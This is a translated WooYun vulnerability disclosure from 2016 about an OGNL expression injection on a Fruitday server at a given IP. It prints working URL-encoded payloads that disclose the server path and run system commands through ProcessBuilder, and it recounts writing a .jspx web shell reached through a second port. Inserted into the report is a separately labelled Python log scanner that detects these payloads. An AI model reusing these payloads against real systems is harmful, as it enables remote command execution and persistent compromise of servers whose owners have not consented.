
Expression injection on a Fruitday (天天果园) platform (Getshell achieved)

ID: 219335
URL: http://www.wooyun.org/bug.php?action=view&id=219335
Status: vulnerability reported to the vendor, but the vendor ignored it
Title: Expression injection on a Fruitday (天天果园) platform (Getshell achieved)
Type: command execution
Vendor: fruitday.com
White hat: A1opex
Submitted: 2016-06-15 06:49:00
Published: 2016-06-20 07:40:00
Fixed: (not set)
Confirmed: 0000-00-00 00:00:00
Confirm spend: -1
Tags: expression injection
Followers: 0
Favorites: 0
White-hat rating:
White-hat self-rating: rank 20
Vendor rating:
Vendor-assigned rank: 0
Summary

"Some of us don't get to grow old with the one we love."
 — "I'll go old with her, Mr. Reese, just from afar."
One day, sunny yet overcast, I took an afternoon nap and dreamed that a certain IP had an expression injection. I woke up, opened the laptop, and, working from scattered memories, got a shell.
Details

http://180.167.72.216:89

(screenshot: fruitday6.png)


Found an expression injection.

(screenshot: fruitday5.png)


Payload:

%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D


This discloses the absolute path.
Tried to write a shell.
That failed, though: every other page required login.
Thought and thought; couldn't just give up.
An nmap scan showed another web service on port 88.

(screenshot: fruitday2.png)


Conveniently, closing the popup redirects to a help file, and that file does not require login.
So, back at the expression injection on port 89:

%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:\*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D


This located the physical path of the web service on port 88.
Write the shell.
A plain .jsp certainly wouldn't work, but .jspx did.

(screenshot: fruitday4.png)

(screenshot: fruitday1.png)


In short: command execution on service A was used to write a shell that was then accessed through service B.
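As an added defensive example (my own code, not part of the original report), the following scanner percent-decodes the request path in web-server access-log lines and flags the OGNL indicators the payloads above share: the ${#...} wrapper, #context lookups of the xwork2 dispatcher objects, getRealPath disclosure and process spawning. The log lines and indicator names are constructed; the double-encoding handling goes beyond the report's own payloads.

```python
import re
from urllib.parse import unquote

# Indicator patterns drawn from the payload shapes in this report: the ${#...}
# OGNL wrapper, #context lookups of the xwork2 dispatcher objects, real-path
# disclosure and process spawning. The indicator names are my own.
OGNL_INDICATORS = {
    "ognl_expression_wrapper": re.compile(r"[$%]\{\s*#"),
    "xwork2_context_lookup": re.compile(r"#context\.get\(\s*['\"]com\.opensymphony\.xwork2", re.I),
    "real_path_disclosure": re.compile(r"getRealPath\(", re.I),
    "process_spawn": re.compile(r"java\.lang\.(ProcessBuilder|Runtime)", re.I),
}

# Combined Log Format prefix: client, identity, user, timestamp, request line, status.
LOG_LINE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    # Percent-decode repeatedly so double-encoded payloads normalise as well.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request_path(path):
    # Sorted names of every indicator that matches the decoded request path.
    decoded = decode_fully(path)
    return sorted(name for name, rx in OGNL_INDICATORS.items() if rx.search(decoded))

def scan_access_log(lines):
    # One finding per parseable log line whose request path shows OGNL indicators.
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the expected format
        hits = scan_request_path(m.group("path"))
        if hits:
            findings.append({"src": m.group("src"), "ts": m.group("ts"), "indicators": hits})
    return findings

# Constructed sample log: a benign request, a request carrying the report's first
# payload, and a double-encoded #context lookup (my own variant, not from the report).
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jun/2016:06:40:01 +0800] "GET /index.action?name=apple HTTP/1.1" 200 512',
    '10.0.0.9 - - [15/Jun/2016:06:41:12 +0800] "GET /index.action?name=%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D HTTP/1.1" 200 77',
    '10.0.0.9 - - [15/Jun/2016:06:43:30 +0800] "GET /index.action?name=%2524%257B%2523context.get%2528%2527com.opensymphony.xwork2.dispatcher.HttpServletRequest%2527%2529%257D HTTP/1.1" 200 512',
]
```

Run scan_access_log(SAMPLE_LOG) to see both malicious lines flagged with their indicator names; a single indicator is worth an alert, several together is almost certainly an injection attempt.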


Fix recommendation

You know better than I do >3<

Status history:
2016-06-15: details sent to the vendor, awaiting vendor response
2016-06-15: vendor has viewed the vulnerability; details visible only to the vendor
2016-06-20: vendor has actively ignored the vulnerability; details made public
Vendor reply: None
Vulnerability rank: 15 (WooYun rating)
Response: severity: no impact; vendor ignored; ignored at 2016-06-20 07:40
Comments (commenter, likes, time):

A1opex (0 likes, 2016-06-16 10:49:00): @荒废的腰子 TuT half-time break

CodeMan (0 likes, 2016-06-15 14:31:00): "Some of us don't get to grow old with the one we love." — "I'll go old with her, Mr. Reese, just from afar." One day, sunny yet overcast, I took an afternoon nap and dreamed that a certain IP had an expression injection. I woke up, opened the laptop, and, working from scattered memories, got a shell.

重瞳 (0 likes, 2016-06-15 12:49:00): @荒废的腰子 .....

李旭敏 (0 likes, 2016-06-15 10:38:00): Officer, it's this person!

荒废的腰子 (0 likes, 2016-06-15 10:34:00): The boss is calling you to go review plugins...

Ano_Tom (0 likes, 2016-06-15 09:49:00): Literary female hacker

boooooom (0 likes, 2016-06-15 09:47:00): Poetic and picturesque